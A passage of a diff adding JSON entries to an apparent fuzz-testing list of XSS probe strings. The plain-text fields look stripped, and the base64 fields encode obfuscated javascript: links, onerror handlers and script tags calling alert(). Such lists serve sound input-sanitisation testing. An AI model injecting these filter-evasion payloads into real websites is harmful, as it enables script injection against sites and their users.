DEF",
+ "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODNleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNTkpIj5ERUY="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "ABC
DEF",
+ "base64": "QUJDPGRpdiBzdHlsZT0ieDpceEUyXHg4MFx4ODlleHByZXNzaW9uKGphdmFzY3JpcHQ6YWxlcnQoNjApIj5ERUY="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2MSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhDMlx4QTBqYXZhc2NyaXB0OmphdmFzY3JpcHQ6YWxlcnQoNjMpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2NCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMVx4QTBceDhFamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDY1KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2NikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg2NykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg4amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDY4KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg5amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDY5KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDcwKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxN2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3MSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwM2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwRWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3MykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxQWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3NCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3NSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3NikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgyamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDc3KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgyMGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3OCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxM2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg3OSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwOWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4MCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDhBamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDgxKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxNGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxOWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4MykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceEFGamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDg0KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4NSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgxamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDg2KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxRGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4NykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg3amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDg4KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwN2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg4OSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMVx4OUFceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDkwKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDgzamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDkxKSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwNGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5MikiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5MykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5NCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg0amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDk1KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg2amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDk2KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFM1x4ODBceDgwamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDk3KSIgaWQ9ImZ1enplbGVtZW50MSI+dGVzdDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxMmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5OCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwRGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCg5OSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwQWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDApIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwQ2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDEpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDIpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceEE4amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEwMykiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxNmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDQpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwMmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDUpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDYpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgwNmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMDcpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceEE5amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEwOCkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODBceDg1amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEwOSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxRWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMTApIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHhFMlx4ODFceDlGamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDExMSkiIGlkPSJmdXp6ZWxlbWVudDEiPnRlc3Q8L2E+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iXHgxQ2phdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxMTIpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MDA6amF2YXNjcmlwdDphbGVydCgxMTMpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4M0E6amF2YXNjcmlwdDphbGVydCgxMTQpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MDk6amF2YXNjcmlwdDphbGVydCgxMTUpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MEQ6amF2YXNjcmlwdDphbGVydCgxMTYpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
test",
+ "base64": "PGEgaHJlZj0iamF2YXNjcmlwdFx4MEE6amF2YXNjcmlwdDphbGVydCgxMTcpIiBpZD0iZnV6emVsZW1lbnQxIj50ZXN0PC9hPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MEFvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTE4KT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MjJvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTE5KT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MEJvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIwKT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MERvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIxKT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MkZvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIyKT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MDlvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTIzKT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MENvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI0KT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MDBvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI1KT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MjdvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI2KT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "`\"'>

",
+ "base64": "YCInPjxpbWcgc3JjPXh4eDp4IFx4MjBvbmVycm9yPWphdmFzY3JpcHQ6YWxlcnQoMTI3KT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgzQmphdmFzY3JpcHQ6YWxlcnQoMTI4KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgwRGphdmFzY3JpcHQ6YWxlcnQoMTI5KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFRlx4QkJceEJGamF2YXNjcmlwdDphbGVydCgxMzApPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgxamF2YXNjcmlwdDphbGVydCgxMzEpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg0amF2YXNjcmlwdDphbGVydCgxMzIpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFM1x4ODBceDgwamF2YXNjcmlwdDphbGVydCgxMzMpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgwOWphdmFzY3JpcHQ6YWxlcnQoMTM0KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg5amF2YXNjcmlwdDphbGVydCgxMzUpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg1amF2YXNjcmlwdDphbGVydCgxMzYpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg4amF2YXNjcmlwdDphbGVydCgxMzcpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgwMGphdmFzY3JpcHQ6YWxlcnQoMTM4KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEE4amF2YXNjcmlwdDphbGVydCgxMzkpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDhBamF2YXNjcmlwdDphbGVydCgxNDApPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMVx4OUFceDgwamF2YXNjcmlwdDphbGVydCgxNDEpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgwQ2phdmFzY3JpcHQ6YWxlcnQoMTQyKTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgyQmphdmFzY3JpcHQ6YWxlcnQoMTQzKTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhGMFx4OTBceDk2XHg5QWphdmFzY3JpcHQ6YWxlcnQoMTQ0KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+LWphdmFzY3JpcHQ6YWxlcnQoMTQ1KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgwQWphdmFzY3JpcHQ6YWxlcnQoMTQ2KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEFGamF2YXNjcmlwdDphbGVydCgxNDcpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHg3RWphdmFzY3JpcHQ6YWxlcnQoMTQ4KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg3amF2YXNjcmlwdDphbGVydCgxNDkpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODFceDlGamF2YXNjcmlwdDphbGVydCgxNTApPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceEE5amF2YXNjcmlwdDphbGVydCgxNTEpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhDMlx4ODVqYXZhc2NyaXB0OmFsZXJ0KDE1Mik8L3NjcmlwdD4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFRlx4QkZceEFFamF2YXNjcmlwdDphbGVydCgxNTMpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgzamF2YXNjcmlwdDphbGVydCgxNTQpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDhCamF2YXNjcmlwdDphbGVydCgxNTUpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFRlx4QkZceEJFamF2YXNjcmlwdDphbGVydCgxNTYpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgwamF2YXNjcmlwdDphbGVydCgxNTcpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
